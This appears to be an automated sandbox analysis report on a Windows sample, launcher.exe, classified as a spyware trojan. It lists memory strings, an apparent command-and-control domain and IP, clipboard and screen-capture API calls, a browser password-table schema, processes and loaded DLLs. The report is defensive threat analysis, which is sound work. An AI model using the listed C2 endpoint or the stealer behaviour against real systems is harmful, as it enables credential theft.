Source: launcher.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824320926.0000000003573000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824556748.000000000354C000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279932255.000000000354E000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/
Source: launcher.exe, 00000003.00000003.2824320926.0000000003568000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/api
Source: launcher.exe, 00000003.00000003.2112556351.0000000003589000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2112215761.0000000003589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apiSF1Bg=
Source: launcher.exe, 00000003.00000002.3280068773.0000000003574000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2201777570.0000000003573000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824320926.0000000003573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/p
Source: launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click:443/apidowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WS
Source: launcher.exe, 00000003.00000003.2824320926.0000000003525000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824513504.0000000003559000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279952699.000000000355C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click:443/apis
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: launcher.exe, 00000003.00000003.2113677933.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: launcher.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: launcher.exe, 00000003.00000003.2063930213.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063880177.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2063998893.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: launcher.exe, 00000003.00000003.2113388617.0000000005D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_00431740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00431740

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_05941000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_05941000

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_00431740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00431740

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_004321CA GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_004321CA

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B31000	0_2_00B31000
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B3F555	0_2_00B3F555
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B57792	0_2_00B57792
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B49CC0	0_2_00B49CC0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B55C5E	0_2_00B55C5E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B43FB2	0_2_00B43FB2
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040D071	3_2_0040D071
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043D810	3_2_0043D810
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043E110	3_2_0043E110
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00436240	3_2_00436240
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00411A70	3_2_00411A70
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004223B0	3_2_004223B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00421C71	3_2_00421C71
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004104AC	3_2_004104AC
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00425560	3_2_00425560
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004365E0	3_2_004365E0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00418592	3_2_00418592
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00408640	3_2_00408640
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042B744	3_2_0042B744
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00421FAE	3_2_00421FAE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042A040	3_2_0042A040
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00411056	3_2_00411056
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042F870	3_2_0042F870
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00423076	3_2_00423076
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043D020	3_2_0043D020
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004168F7	3_2_004168F7
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041D080	3_2_0041D080
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00427897	3_2_00427897
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040A8B0	3_2_0040A8B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043D0B0	3_2_0043D0B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00405940	3_2_00405940
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042514E	3_2_0042514E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041C960	3_2_0041C960
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042690B	3_2_0042690B
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00403920	3_2_00403920
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043A120	3_2_0043A120
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004211C0	3_2_004211C0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004371E0	3_2_004371E0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004259F0	3_2_004259F0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004061A0	3_2_004061A0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040CA63	3_2_0040CA63
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00419270	3_2_00419270
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CA70	3_2_0043CA70
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00409210	3_2_00409210
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004042D0	3_2_004042D0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00435AD0	3_2_00435AD0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040B2DC	3_2_0040B2DC
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043DAE0	3_2_0043DAE0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00425AE5	3_2_00425AE5
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00445295	3_2_00445295
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042BA95	3_2_0042BA95
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043B2A0	3_2_0043B2A0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00424B4E	3_2_00424B4E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041D350	3_2_0041D350
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042514E	3_2_0042514E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00427897	3_2_00427897
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040B30C	3_2_0040B30C
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042C30F	3_2_0042C30F
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00431320	3_2_00431320
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00437B2A	3_2_00437B2A
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042A3C8	3_2_0042A3C8
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042ABC9	3_2_0042ABC9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004263D6	3_2_004263D6
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00422B80	3_2_00422B80
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043BBBE	3_2_0043BBBE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043AC63	3_2_0043AC63
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041E460	3_2_0041E460
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00404C00	3_2_00404C00
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00407410	3_2_00407410
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004284DF	3_2_004284DF
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040B4E6	3_2_0040B4E6
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0040B4E6	3_2_0040B4E6
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004344F1	3_2_004344F1
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00427560	3_2_00427560
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00414D7D	3_2_00414D7D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00435D30	3_2_00435D30
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004095D0	3_2_004095D0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00425DD7	3_2_00425DD7
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043DDF0	3_2_0043DDF0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00414580	3_2_00414580
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CDA0	3_2_0043CDA0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004175BE	3_2_004175BE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00415E4D	3_2_00415E4D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00434E60	3_2_00434E60
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00405E00	3_2_00405E00
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042DE29	3_2_0042DE29
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043AE2E	3_2_0043AE2E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00406630	3_2_00406630
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CEC0	3_2_0043CEC0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041C6D0	3_2_0041C6D0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CEDB	3_2_0043CEDB
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CED9	3_2_0043CED9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004236E0	3_2_004236E0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00411753	3_2_00411753
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00428751	3_2_00428751
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042D73D	3_2_0042D73D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0041B7E0	3_2_0041B7E0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00414F80	3_2_00414F80
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00413FB0	3_2_00413FB0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00421FB0	3_2_00421FB0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B31000	3_2_00B31000
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B3F555	3_2_00B3F555
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B57792	3_2_00B57792
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B49CC0	3_2_00B49CC0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B55C5E	3_2_00B55C5E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B43FB2	3_2_00B43FB2

Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00B40730 appears 38 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00407FC0 appears 36 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00B480F8 appears 42 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00413FA0 appears 56 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00B3FA60 appears 100 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00B4CFD6 appears 40 times
Source: C:\Users\user\Desktop\launcher.exe	Code function: String function: 00B3FAE4 appears 34 times

Source: launcher.exe

Static PE information: invalid certificate

Source: launcher.exe, 00000000.00000000.2009093849.0000000000BBC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs launcher.exe
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs launcher.exe
Source: launcher.exe, 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs launcher.exe
Source: launcher.exe, 00000003.00000003.2017308415.0000000004E50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs launcher.exe
Source: launcher.exe	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs launcher.exe

Source: launcher.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: launcher.exe

Static PE information: Section: .bss ZLIB complexity 1.0003372061965812

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/1@1/1

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_004365E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_004365E0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: launcher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\launcher.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: launcher.exe, 00000003.00000003.2064360321.0000000005C2A000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2064111477.0000000005C46000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: launcher.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\launcher.exe

File read: C:\Users\user\Desktop\launcher.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\launcher.exe "C:\Users\user\Desktop\launcher.exe"
Source: C:\Users\user\Desktop\launcher.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\launcher.exe	Process created: C:\Users\user\Desktop\launcher.exe "C:\Users\user\Desktop\launcher.exe"
Source: C:\Users\user\Desktop\launcher.exe	Process created: C:\Users\user\Desktop\launcher.exe "C:\Users\user\Desktop\launcher.exe"	Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: version.dll	Jump to behavior
